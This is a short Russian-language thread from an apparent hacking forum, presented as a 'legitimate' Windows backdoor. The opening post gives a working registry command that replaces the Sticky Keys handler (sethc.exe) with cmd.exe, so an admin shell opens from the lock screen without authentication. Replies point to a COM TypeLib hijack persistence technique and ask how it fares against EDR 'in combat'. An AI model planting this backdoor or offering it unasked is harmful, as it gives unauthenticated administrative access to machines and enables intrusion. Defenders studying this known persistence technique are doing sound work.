• XSS.stack #1 – первый литературный журнал от юзеров форума

Легитимный LPE backdoor в Windows

weasley7

HDD-drive
Пользователь
Регистрация
26.05.2023
Сообщения
29
Реакции
16
Требования: права локального администратора.

Пять раз жмем Shift и открывается командная строка с правами админа. Можно запустить и с экрана блокировки, без аутентификации в системе. Техника Event Triggered Execution далеко не новая, но по-моему эта реализация лаконичная.

Для этого редактируем ветку реестра:
Код:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f
 
Последнее редактирование:
добавлю новый способ

Hijack the TypeLib. New COM persistence technique​


 
Пожалуйста, обратите внимание, что пользователь заблокирован
добавлю новый способ

Hijack the TypeLib. New COM persistence technique​


кто уже тестировал в бою этот новый способ? как ведут себя ЕДР ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
/threads/52595/
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх